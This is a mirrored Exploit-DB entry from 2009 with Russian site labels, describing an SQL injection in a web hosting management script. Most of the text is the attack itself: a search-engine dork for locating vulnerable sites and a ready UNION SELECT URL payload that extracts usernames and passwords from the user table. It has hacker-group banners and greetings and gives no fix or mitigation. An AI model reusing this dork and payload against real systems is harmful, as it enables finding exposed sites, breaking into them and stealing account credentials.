- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10493
- Проверка EDB
-
- Пройдено
- Автор
- DR.0RYX & CR3W-DZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-12-16
Код:
ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************
[!] WHMCompleteSolution CMS sql Injection Vulnerability
[!] Author : Dr.0rYX and Cr3w-DZ
[!] MAIL : [email protected] & [email protected]
***************************************************************************/
[ Software Information ]
[+] Vendor : http://www.siamhostserver.com/whmcs/
[+] script : WHMCompleteSolution CMS
[+] Download : http://www.siamhostserver.com/whmcs/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"weblink_cat_list.php?bcat_id="
**************************************************************************/
[ Vulnerable File ]
http://server/weblink_cat_list.php?bcat_id=[N.A.S.T ]
[ Exploit ]
http://server/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user
[ GReets ]
[+] :CLAW , le0n , HIS0K4 , WWW.exploit-db.com , ALL HACKERS MUSLIMS- Источник
- www.exploit-db.com
